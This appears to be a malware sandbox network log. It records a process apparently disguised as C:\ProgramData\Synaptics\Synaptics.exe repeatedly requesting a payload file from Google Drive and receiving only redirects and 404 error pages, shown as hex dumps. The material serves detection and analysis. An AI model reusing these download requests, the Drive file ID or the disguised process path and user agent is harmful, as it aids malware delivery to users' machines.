                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:18 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-QAEYowd4PxBibscYeee6jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      48192.168.2.549788142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:18 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:18 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-KVi2WB_uVLkdnFLtlgQLhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      49192.168.2.549800142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:19 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:19 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YyJHhVdVEaApmHA8PLdCYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      50192.168.2.549801142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:19 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:19 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-aTpp6NkA-TNaILNR7JZJyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      51192.168.2.549805142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:19 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:19 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC67q00C5o_iFOdziiaR8j4UF2FaCVSMZGyb9EXjcE92JYRxbxlUTvNDiYky6tUoOVUOtSOZ9fI
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:19 GMT
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-XP8sndq2gKVeH2CbBIJ_aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:19 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:19 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 35 76 7a 64 5a 77 57 47 68 56 51 38 79 38 64 35 6f 6d 33 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="Y5vzdZwWGhVQ8y8d5om3gg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:19 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      52192.168.2.549807142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:19 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:20 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7MdkIb6jfZdquRZH2DutGXlT2pXQoze3zO1jqmm4-YD2lIq9-mWBCa9Rxxo-2tStEU49s3298
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:19 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-nllpoLKxVhNqGPZ_Xi1waw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:20 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:20 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 74 2d 77 49 54 39 75 6f 73 50 6f 6e 44 36 64 71 43 31 62 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="Jt-wIT9uosPonD6dqC1bTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:20 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      53192.168.2.549816142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:20 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:20 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-m5_AzXYUxi2PHMcSdleH9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      54192.168.2.549817142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:20 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      55192.168.2.549818142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:20 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      56192.168.2.549819142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:20 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      57192.168.2.549828142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:21 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:21 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5ZL7jZETWOdw9ez3hWjVKzzAlrLiB-a_o-UFF3R9T2Rwi5xVK7KV8cLKPVjpgWCJBbaBCLqVo
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:21 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-X_aDOfXI0bC16acdRcR0Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
